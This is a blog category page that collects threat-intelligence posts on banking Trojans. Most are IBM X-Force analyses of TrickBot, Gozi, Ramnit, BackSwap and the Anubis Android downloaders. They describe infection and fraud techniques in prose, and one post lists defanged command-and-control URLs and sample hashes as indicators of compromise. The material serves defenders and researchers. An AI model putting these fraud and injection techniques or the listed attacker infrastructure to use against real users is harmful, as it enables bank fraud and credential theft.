Browsing category

Banking Trojan

Advanced Persistent Threat (APT), Banking Trojan, Cybercrime, Cybercrime Trends, Cybercriminals, DRIDEX, Gozi, IBM X-Force Research, Malware, Malware analysis, Ramnit, Ransomware, Threat Intelligence, Trickbot, X-Force,

The Business of Organized Cybercrime: Rising Intergang Collaboration in 2018

Banking Trojans and the gangs that operate them continue to plague banks, individuals and organizations with fraudulent transactions facilitated by malware and social engineering schemes. At last check, cybercrime cost the global economy more than $600 billion in 2017 , and forecasts for 2018 predicted $1.5 trillion in losses.

No matter how you turn these numbers, they are a burden that keeps growing and encouraging a rife, complex industry of online crime.

Going Behind the Numbers of the ‘IBM X-Force Threat Intelligence Index’

Every year, increasingly organized cybercrime gangs shuffle their tactics, techniques and procedures (TTPs) to evade security controls on the micro level and law enforcement on the macro level. Behind each malware named on the top 10 chart below, codes are distributed and operated differently and focus on different parts of the globe. The chart is populated by organized cybercrime gangs that have ties to yet other cybercrime gangs, each doing its part to feed the perpetual supply chain of a digital financial crime economy.

In cybercrime, it can be said that the more things change, the more things stay the same. In 2018, however, I must admit I was finally surprised when two malware gangs that did not appear connected at first began openly collaborating. It thus became clearer than ever that the banking Trojan arena is dominated by groups from the same part of the world, by people who know each other and collaborate to orchestrate high-volume wire fraud.

To learn more about the malware that shaped 2018, let’s begin by looking at the top constituents of the gang-owned Trojan chart and drill down on information gathered by IBM Security for the top three.

Top Trojan Chart 2018 - IBM Security Research

Figure 1: Top 10 chart of the most active banking Trojan families in 2018 (source: IBM X-Force)

1. TrickBot

TrickBot, a banking Trojan operated by a Russia-based threat group, was one of the most aggressive Trojans of 2018. It targets banks across the globe with URL-heavy configurations that often include a large number of targeted bank brands from across the globe.

TrickBot’s operators focus on business banking and high-value accounts that are held with private banking and wealth management firms, but they also diversified in 2018 to include various e-commerce and cryptocurrency exchange platforms on their target lists.

According to IBM X-Force data that was gathered since TrickBot’s rise, no other financial Trojan is as consistently active in terms of infection campaigns and deployment of redirection attacks, indicating that its operators have ample resources and connections to develop and operate the malware in different parts of the world. Despite this overall capability, X-Force saw TrickBot sharpening its focus in 2018 and targeting a handful of countries in each campaign, keeping major economies such as the U.K. and the U.S. on almost every target list.

Intergang Collaboration With IcedID

Some of the trends in TrickBot’s activity in 2018 included collaboration with another banking Trojan, IcedID, which IBM X-Force discovered in September 2017, as well as operating the Ryuk ransomware, a subset of TrickBot’s botnet monetization strategy. These highlight a larger trend of intergang collaboration among Trojan operators striving to generate larger profits in spite of growing security control sophistication.

At first, TrickBot and IcedID appeared unrelated. But about eight months into IcedID’s existence, signs of a link between the two became apparent. In May 2018, X-Force researchers observed TrickBot dropping IcedID, whereas it had previously been dropped primarily by the Emotet Trojan, the same distributor that also drops TrickBot in different campaigns.

By August 2018, our researchers noted that IcedID had been upgraded to behave in a similar way to the TrickBot Trojan in terms of its deployment. The binary file was modified to become smaller and no longer featured embedded modules. The malware’s plugins were being fetched and loaded on demand after the Trojan was installed on infected devices. These changes made IcedID stealthier, modular and more similar to TrickBot.

In addition to its increased stealth level, IcedID also started encrypting its binary file content by obfuscating file names associated with its deployment on the endpoint. Also similar to TrickBot is IcedID’s event objects, which coordinate multiple threads of execution in Windows-based operating systems. IcedID began using named events to synchronize the execution between its core binary and the plugins selected for loading. When a plugin was called upon, it was fetched by its ID number from the attacker’s server and, when loaded, assigned a unique ID.

Although malware authors do sometimes copy from one another, our research indicates these modifications were not coincidental. Even if we only looked at the fact that TrickBot and IcedID fetch one another into infected devices, that would be indication enough that these Trojans are operated by teams that work together.

Longtime Partners?

Ties between TrickBot and IcedID may have started years ago in a collaboration designed to help both groups maximize their illicit operations and profits. During the six-year activity phase of the Neverquest (aka Catch or Vawtrak) Trojan, it collaborated with the Dyre group to deliver Dyre malware to devices already infected with Neverquest.

The original Dyre group partly disbanded in late 2015, followed by the rise of TrickBot, which is believed to be the successor to Dyre. Neverquest halted operations following the arrest of one of its key members in 2016, after which the IcedID Trojan appeared. With the two featuring advanced capabilities and evident cybercrime connections with other gangs, their current-day collaboration likely started years ago.

The TrickBot-Ryuk Connection

Another TrickBot trend that started in 2018 is a connection with ransomware. Reminiscent of the Dridex Trojan’s links to the Locky and then BitPaymer ransomware, TrickBot began dropping ransomware called Ryuk. Unlike wide-cast nets that spread ransomware to as many email recipients as possible, Ryuk, like BitPaymer, is spread in targeted campaigns where attackers go through the typical advanced persistent threat (APT) kill chain and manually breach the network.

Ryuk attackers often go through reconnaissance stages, looking for valuable data to hijack. The goal: Infect established organizations with Ryuk and then demand large sums in ransom payments that average hundreds of thousands of dollars each.

Malware drop killchain

Figure 2: Ryuk campaigns — a four-step routine to drop three different Trojans to target devices (source: IBM X-Force)

Upon investigating Ryuk’s code, it quickly became apparent that this ransomware was not entirely new. Ryuk closely resembles the Hermes ransomware that was linked with malicious activity by a nation-state-sponsored group called Lazarus (aka Hidden Cobra).

Is Ryuk connected to Hermes? That’s one possibility. It could also be that some Lazarus members collaborate with banking Trojan operators through cross-border partnerships to steal and launder large amounts of cybercrime money via Eastern Europe and Asia, or that someone with access to the Hermes code reused it to create Ryuk.

Whatever the source of Ryuk, it shows that TrickBot’s operators are diversifying their nefarious activity, continuing to focus heavily on the business sector and launching targeted attacks that press organizations to pay.

Major Trojans collaborate

Figure 3: Collaboration between major malware gangs (source: IBM X-Force)

TrickBot TTPs and Evolution

In terms of its TTPs, TrickBot’s operators focus their efforts on businesses and, therefore, opt for distribution through booby-trapped productivity files and fake bank websites. After infection, TrickBot modules allow it to spread laterally in compromised networks and infect additional users.

TrickBot continues to use both server-side injections deployed on the fly from its attack server and redirection attacks hosted on its servers to hijack users and present them with a fake replica of their bank’s website.

In 2018, TrickBot’s developers added three new functions to the malware, facilitating the theft of Remote Desktop Protocol (RDP) credentials, Virtual Network Computing (VNC) credentials and PuTTY open-source terminal emulator credentials. It steals Windows system reliability and performance data and features a new mechanism for storing its configuration and elliptic curve cryptography (ECC) public keys.

The TrickBot botnet is supported by what’s considered a mature infrastructure, where some campaigns featured 2,458 unique command-and-control (C&C) IP addresses used in 493 main configuration releases across 276 versions — all in one week.

X-Force expects to see TrickBot maintain its position on the global malware chart unless it is interrupted by law enforcement in 2019.

2. Gozi

Gozi (aka Ursnif) has been highly active in the wild for more than a decade now, a rare occurrence in the cybercrime arena. The malware was first discovered in 2007, when it was operated by a closed group of developers and cybercriminals. At the time, it was used to target online banking users mostly in English-speaking countries.

Throughout the years, Gozi has gone through almost every phase a banking Trojan can go through. Its code was leaked in 2010, giving rise to other Trojans, such as Neverquest, that also dominated the cybercrime charts for years after. It was used in the Gozi-Prinimalka ordeal in 2012 and, in 2013, was fitted with a master boot record (MBR) rootkit to create high persistence through a computer’s MBR.

In 2016, X-Force reported about the rise of the GozNym hybrid, a two-headed beast spawned from the Nymaim malware and embedded with the Gozi financial fraud module. Starting in 2017, X-Force researchers reported that a new variation of Gozi was being tested in Australia: Gozi v3. The malware was based on the same code of the original Gozi ISFB but featured some modifications on the code injection level and attack tactics.

In 2018, Gozi v2 was the second-most active Trojan in the wild, working across the globe and in Japan. V2 is operated separately from the v3 version that continues to target banks in the Australia-New Zealand region. The malware is operated in a cybercrime-as-a-service model that allows different cybercriminals to use the botnet to conduct fraud.

To reach new victims, Gozi is distributed in document and spreadsheet attachments that prompt the user to enable macros. In recent campaigns, when the user complies, the macro runs the WMI Provider Host process (wmiprvse) to execute a malicious PowerShell script. The script is designed to fetch the payload and uses string concatenation to evade detection.

Recently, in the case of attack schemes against banks in Europe, Gozi delivered custom-tailored client-side code for each targeted bank brand users accessed, likening its tactics to redirection attacks in which each brand is targeted in a specific way.

Gozi’s distributors use malicious websites to host their resources but check the target device’s Geo IP to reduce the potential of exposure. If either Russian or Chinese keyboard settings are detected during its installation, the deployment ends.

This malware has been part of the top-most constituents of the global malware chart for the past five years, and X-Force expects to see this longtime staple of the organized cybercrime arena maintain its position on the chart in 2019.

3. Ramnit

Ramnit is a prolific banking Trojan that has been active in the wild since 2010. Ramnit started out as a self-replicating worm, leveraging removable drives and network shares to spread to new endpoints. As the project evolved, Ramnit morphed into a modular banking Trojan and started spreading via popular exploit kits such as Angler and RIG.

Although it was one of the most prominent Trojans between 2011 and 2014, Ramnit was targeted by law enforcement in 2015. While it was one of the only botnets to ever survive a coordinated disruption, its operators have not returned to the same level of activity since. In recent years, Ramnit has been an on-again-off-again operation, seeing long lulls in its cybercrime activity and narrowing its attack turf over time to focus mostly on the U.K., Canada and Japan.

2018: Reemergence and Intergang Collaboration

In 2018, the Ramnit Trojan returned to the cybercrime arena with revamped code and a new partner, a proxy malware known as Ngioweb. Ramnit’s developer modified its financial module to enhance its capabilities and changed the internal module’s name from “Demetra” to “Camellia.”

Ramnit’s 2018 comeback resulted in a reported infection of more than 100,000 devices within the span of two months, as part of an operation code-named “Black.” In this campaign, Ramnit went back to its worm roots and was used as a first-stage infection in a kill chain designed to amass a large proxy botnet for Ngioweb.

How good was this new partnership for Ramnit? We can only assume that it was used to create a massive proxy botnet that would resemble the Gameover Zeus botnet in its architecture. The Black campaign was short-lived, and by the end of 2018, Ramnit was linked with Emotet, Dridex and BitPaymer for using the same dropper as those Trojans and being used itself as a dropper for Dridex.


Configuration and code comments show that Ramnit is probably being developed by new team members. Configuration injects were modified to Lua programming and, in many cases, came bugged or unsophisticated. This was not the case for this malware in past years.

For its deployment routine, Ramnit began leveraging code that relies on PowerShell scripts in what’s known as reflective PE injection. Its modules are not pulled from a remote server but come packed with the core malware, and its reliance on a domain generation algorithm (DGA) has been modified to include hardcoded domains.

Will we continue to see Ramnit in 2019? X-Force researchers expect to see the same activity pattern for this malware with its come-and-go nature in Japan and Europe. Ramnit will likely drop from its current rank on the global Trojan chart and be overtaken by IcedID and newcomers like BackSwap and DanaBot.

Threat Landscape Staples

Banking Trojans have been a burdensome part of the cybercrime threat landscape for more than a decade now. The past five years have shown us that this breed of attackers is only becoming more sophisticated over time, incorporating technical knowledge with advance social engineering to focus schemes on victims that can yield the biggest profits: businesses, cryptocurrency and high-value individuals.

While previous years saw gangs operate as adversaries, occupy different turfs and even attack each other’s malware, our research from 2018 connected the major cybercrime gangs together in explicit collaboration. This trend is a negative sign that highlights how botnet operators join forces, revealing the resilience factor in these nefarious operations.

While it can be hard to detect this type of evolving malware, it’s possible to stop banking Trojans before they make it into your device or your organization. Proper security controls and user education, as well as planned incident response, can help keep this threat at bay and contain its detrimental effects if ever an account is taken over and robbed by highly experienced criminals.

To learn more about the top security threats of 2018 and what 2019 may have in store, download the “IBM X-Force Threat Intelligence Index.” Check out page 30 in the report for our expert team’s tips on mitigating threats and increasing preparedness for a possible breach.

Read the full “IBM X-Force Threat Intelligence Index”

The post The Business of Organized Cybercrime: Rising Intergang Collaboration in 2018 appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: Limor Kessem

Backdoor, Banking Trojan, Computer Security, Cryptocurrency hack, Cyber Security News, Malware, Network Security, Ransomware, Security Hacker, spyware, trojan,

A Scary Evolution & Alliance of TrickBot, Emotet and Ryuk Ransomware Attack

Ryuk first appeared in August 2018, and while not incredibly active across the globe, at least three organizations were hit with Ryuk infections over the course of the first two months of its operations, landing the attackers about $640,000 in ransom for their efforts. According to CrowdStrike analysis from late last week, Grim Spider has […]

The post A Scary Evolution & Alliance of TrickBot, Emotet and Ryuk Ransomware Attack appeared first on GBHackers On Security.

Bank Fraud, Banking & Financial Services, banking malware, Banking Trojan, Fraud Protection, IBM X-Force Research, Malware, malware injection, Man-in-the-Browser (MitB), Man-in-the-Browser (MitB) Malware, Threat Intelligence, Webinjection, X-Force,

BackSwap Malware Now Targets Six Banks in Spain

IBM X-Force researchers analyzed the activity of a relatively new banking Trojan known as BackSwap. BackSwap emerged in March 2018 and, until recently, had only targeted Polish banks. The malware’s target list now features six major banks in Spain.

According to X-Force analysis, BackSwap is its own malware project, but it is based on features that existed within the Tinba Trojan. The malware’s operators keep the code as their own project; in that sense, it is considered gang-owned and not commercial malware.

A Twist in the Tale

Overall, BackSwap is no more sophisticated than any other active banking Trojan. Its highlight is its webinjection mechanism. Instead of using the more common method of hooking browser functions, then creating different versions for each architecture, BackSwap injects JavaScript into the address bar.

By simulating user input to access the browser’s address bar and inserting the malicious script directly there, BackSwap can execute the script using JavaScript protocol URLs and bypass protections of both the browser and the bank’s third-party security controls.

In terms of what BackSwap does with the injections, this is where the novelty ends. Just as malware such as Zeus has been doing for over a decade, BackSwap uses malicious scripts to modify what victims see on their bank’s website in classic man-in-the-browser (MitB) style:

  • Scripts wait for a minimum amount of data to be transferred before replacing the destination account number.
  • Scripts inject mule account numbers on the fly via MitB.
  • Scripts hide the mule account number that the money will go to and instead present the original destination account the victim entered.

BackSwap’s Fraud Method

The likely fraud scenario based on BackSwap’s capabilities is in-session fraud automated by MitB malware scripts. The malware’s scripts wait for the user to go to a page where a transaction is to take place. When the victim initiates activity that’s interesting to the attacker, such as adding a payee or starting a money transfer, the malware replaces the destination account with a mule account number.

BackSwap malware functions

Figure 1: The BackSwap function responsible for account number replacement

Using MitB scripts to alter transaction details sent to the bank is not a new method. What’s new here is the way BackSwap implements it to circumvent third-party security on the bank’s website. This method can be more successful with banks that don’t require two-factor authentication (2FA) or out-of-band transaction authorization (OOBA) from customers moving money to other accounts.

Malware Spam and Then Some

BackSwap is most often delivered to users via malware spam, concealed in an attachment of a productivity file like Microsoft Word or bundled inside other programs. BackSwap favors popular freeware or open source programs and plants its code in the initialization phase of the program. When run during an early stage of the program’s execution, the code replaces the installation routine with malicious instructions that execute BackSwap instead. One interesting choice was Ollydbg.exe, which is a program often used by malware researchers.

Testing Attack Turfs

The malware’s attack scope has thus far been limited to a few banks in Poland and some banks in Spain, specifically targeting personal banking.

The limited number of banks in each country so far may suggest that BackSwap is still in testing. Our research team expects to see more testing in other geographies in the coming weeks, and possibly a wider scope of attack for this Trojan in the fourth quarter of 2018.

Will we see BackSwap on the top 10 list of financial malware in 2019? IBM X-Force will keep updating its information on BackSwap via the X-Force Exchange.

IBM X-Force Research

Figure 2: Top most prevalent financial malware families (2018 YTD)

Indicators of Compromise (IoCs)

Command-and-control (C&C) server IPs:

  • hxxps://5[.]61[.]47[.]74/batya/give.php
  • hxxps://103[.]242[.]117[.]248/batya/give.php
  • hxxps://mta116[.]megaonline[.]in
  • hxxps://czcmail[.]com (IP: 119[.]23[.]128[.]176)

Recent sample MD5s:

  • 180721A8551FBBCD763C320E7034E36C (WinGraph32.exe)
  • F44D28F852A99821B681C3EAF044C8D3 (OllyDbg.exe)

Interested in emerging security threats? Read the latest IBM X-Force Research

The post BackSwap Malware Now Targets Six Banks in Spain appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: Limor Kessem

Android, Android Malware, Banking Trojan, Malware, Ransomware,

Dangerous Android Malware that Steals Banking Credentials, Call Forwarding, Keylogging, and Ransomware Activities

Android malware

A new Android malware that contains the functionalities of Banking Trojan, call forwarding, audio recording, keylogging and Ransomware Activities. The malware targeted the popular banking apps such as HFC, ICICI, SBI, Axis Bank and other E-Wallets. The malware operator needs more user interaction to be a successful attack, it continues to force the users in […]

The post Dangerous Android Malware that Steals Banking Credentials, Call Forwarding, Keylogging, and Ransomware Activities appeared first on GBHackers On Security.

Android, Android Apps, Android security, Banking Trojan, Cybercriminals, Google Play, IBM X-Force Research, Malware, Mobile Applications, Mobile Banking, Mobile Banking Fraud, Mobile Malware, Mobile Security, Threat Intelligence, X-Force,

Anubis Strikes Again: Mobile Malware Continues to Plague Users in Official App Stores

IBM X-Force mobile malware researchers have observed several developers actively uploading Android malware downloaders to the Google Play Store.

Following ongoing campaigns against Google Play, our research team has been monitoring banking malware activity in official app stores. The team recently reported that downloader apps in the store are being used as the first step in an infection routine that fetches the Marcher (aka Marcher ExoBot) and BankBot Anubis mobile banking Trojans. Users who unknowingly install the app on their devices are subsequently infected. Cybercriminals use these banking Trojans to facilitate financial fraud by stealing login credentials to banking apps, e-wallets and payment cards.

Starting in June, our team discovered a number of new malware downloader samples that infect users with BankBot Anubis (aka Go_P00t). The campaign features at least 10 malicious downloaders disguised as various applications, all of which fetch mobile banking Trojans that run on Android-based devices. While the number of downloaders may seem modest, each of those apps can fetch more than 1,000 samples from the criminal’s command-and-control (C&C) servers.

Finding new downloaders in the app store in connection with the BankBot Anubis malware could suggest that:

  • A given malware distributor/cybercrime faction has shifted from using Marcher to distributing BankBot Anubis; or
  • The threat actors distributing the malware on Google Play are offering their “expertise” as a service, spreading malware downloaders for different cybercrime factions that use mobile Trojans to facilitate financial fraud — aka “downloader-as-a-service.”

Such cybercrime services are common in the fraud and malware black markets. They entail a proven ability to infiltrate Google Play and plant malicious downloaders under the guise of benign-looking apps. These services can likely maintain the downloader’s C&C servers long enough to generate a steady stream of new infections, suggesting the thought-out operational security and know-how characteristic of organized cybercrime groups.

Read the white paper: Worried about mobile security? You should be

An Era of Mobile Malware Downloaders

As app store operators layer security to stymie the efforts of malicious developers, black-hat app distributors find ways to sidestep them. To circumvent ever-evolving app store defenses, mobile malware distributors rely on a strategy from the PC malware realms: Instead of uploading the actual malware to the store, which can result in sampling and detection at a very early stage in the distribution chain, they upload a downloader that may seem rather innocuous compared to actual malware.

In general, a downloader app is more likely to survive security checks and recurring scans, and once it lands on a user’s device, it can fetch the intended malware app. As the Chinese general Sun Tzu wrote in “The Art of War,” “The greatest victory is that which requires no battle.”

Sample Downloader Campaign From Current Analyses

In the current campaign, according to X-Force researchers, the downloader apps target Turkish-speaking users. They differ in type and visual style — from online shopping to financial services and even an automotive app — and are designed to look legitimate and enticing to users.

IBM X-Force ResearchIBM X-Force Research

IBM X-Force Research

Figure 1: Examples of malware downloader apps found on Google Play.

The variety of apps and styles indicates a large investment of resources on the part of the campaign’s operators, suggesting that a cybercrime service, rather than a single cybercrime faction, is likely responsible.

The downloaders themselves are rather stealthy, and VirusTotal missed all but one of the samples. The one that was found had zero detections by antivirus engines.

IBM X-Force Research

Figure 2: No detection rates on malicious downloaders.

In this campaign, the malicious downloader apps X-Force detected have the same code base as three apps that ThreatFabric reported in January 2018. The following characteristics show the similarity:

IBM X-Force Research

Figure 3: Code from sample downloader reported by ThreatFabric in January 2018.

IBM X-Force Research

Figure 4: Code from sample downloader discovered by X-Force in June 2018.

The resemblance is even more striking in the figure below. By removing all the key instances (**pE2**) from the string, we produced the same string from the January sample:

IBM X-Force Research

Figure 5: The code bases are very similar, suggesting that the same developer produced both apps.

With 10 downloaders at this point, the campaign appears to be scaling up.

Over time, we’ve seen the code evolve. As time went by between downloader versions, the developers added a simple obfuscation and expanded the downloader capabilities. The code was also altered slightly to avoid detection by Google Play’s security controls.

According to X-Force’s analysis, these changes suggest that the downloader app is being maintained on an ongoing basis — another sign that it is a commodity offered to cybercriminals or a specific group that’s focused on defrauding Turkish mobile banking users.

Anubis Masquerades as Google Protect

After a successful installation of the malicious downloader, the app fetches BankBot Anubis from one of its C&C servers. The BankBot Anubis malware then masquerades as an app called “Google Protect” and prompts the user to grant it accessibility rights.

BankBot Anubis Android malware app

Figure 6: Apps name in Turkish

IBM X-Force ResearchIBM X-Force Research

Figure 7: Malware asking for accessibility to keylog user credentials.

Why ask for accessibility? BankBot Anubis uses Android’s Accessibility services to perform keylogging as a way to obtain the infected user’s credentials when he or she accesses a targeted mobile banking app. In most Android banking Trojans, the malware launches a fake overlay screen when the user accesses a target app. The user then taps his or her account credentials into the fake overlay, which allows the malware to steal the data. BankBot Anubis streamlines this process.

By keylogging the user’s login information, the attacker can steal credentials from any app while avoiding the need to create custom overlays for each target. This malware is also able to take screen captures of the user’s screen, which it likely uses to steal credentials since the keyboard strokes are visible. These features are staples of PC banking malware and are evolving in Android malware as well.

The downloader apps in this particular campaign were designed to address Turkish users. With different botnets and configurations, BankBot Anubis itself also targets users in the following countries:

  • Australia
  • Austria
  • Azerbaijan
  • Belarus
  • Brazil
  • Canada
  • China
  • Czech Republic
  • France
  • Georgia
  • Germany
  • Hong Kong
  • India
  • Ireland
  • Israel
  • Japan
  • Kazakhstan
  • Luxembourg
  • Morocco
  • Netherlands
  • New Zealand
  • Oman
  • Poland
  • Russia
  • Scotland
  • Slovakia
  • Spain
  • Taiwan
  • Turkey
  • U.K.
  • U.S.

While there were 10 downloader apps in the Google Play Store at the time of this writing, the campaign is rather hefty. X-Force estimated the magnitude of campaigns on Google Play by the number of downloads, as well as the number and variety of payloads found. In one case, the researchers fetched more than 1,000 new samples of BankBot Anubis from just one C&C server. Each sample has a different MD5 signature, few of which were documented by any antivirus engine when tested against VirusTotal.

Official App Stores: A Fraudster’s Holy Grail

When it comes to maximizing the results of infection campaigns, mobile malware operators consider official app stores to be the holy grail. Getting a malicious app into an official store yields greater exposure to more potential victims, a cheap distribution channel and user trust. Moreover, malware apps that have already made it into an official store are more likely to fly under the radar of security controls for longer than those hosted on hijacked sites or rogue servers. IBM X-Force reports malicious apps to the official stores to have them removed before more users can be affected.

Malicious apps are a blight that both store operators and developers work hard to limit. Still, it is a recurring problem: In 2017, X-Force mobile researchers reported numerous occasions on which financial malware had sneaked into the Google Play Store, with the BankBot Android malware family leading the pack. The trend continues to escalate.

X-Force researchers suspect that the cybercrime services spreading mobile Trojans have mastered it as a malware campaign channel and may be monetizing it. While such cybercrime services are rather popular with PC malware distributors, its rise in the mobile malware realm is an escalating risk factor users and organizations should be aware of.

To learn more about keeping devices safe from mobile malware, read our mobile malware mitigation tips.

Read the white paper: Worried about mobile security? You should be

The post Anubis Strikes Again: Mobile Malware Continues to Plague Users in Official App Stores appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: Shachar Gritzman

banking malware, Banking Trojan, Cyber Security News, Microsoft word, Torjan Horses/worms, Ursnif Banking Trojan,

A New Variant of Ursnif Banking Trojan Distributed Through Malicious Microsoft Word Documents

Ursnif Banking Trojan

A new improved version of the infamous Ursnif banking Trojan leverages Necurs botnet infrastructure targets Italian companies. The malware primarily targets the financial sector and it was detected first in year 2009. CSE Cybsec ZLab researchers spotted the new campaign to be active from 6th June, it hit’s Italian companies with a malicious Microsoft Word […]

The post A New Variant of Ursnif Banking Trojan Distributed Through Malicious Microsoft Word Documents appeared first on GBHackers On Security.

banking malware, Banking Trojan, Malware,

Banking Malware posed as a Popular Social Media App to Steal Financial Data From Online Banking Systems


Newly discovered Two Android Banking Trojan posed as popular social Media and banking apps to steal the victim’s financial information from online banking and payment systems Android Banking Trojan’s mainly targeting the financial sector such as bank and other financial institutions and compromising it to steal sensitive information such as username, password and credit card data. […]

The post Banking Malware posed as a Popular Social Media App to Steal Financial Data From Online Banking Systems appeared first on GBHackers On Security.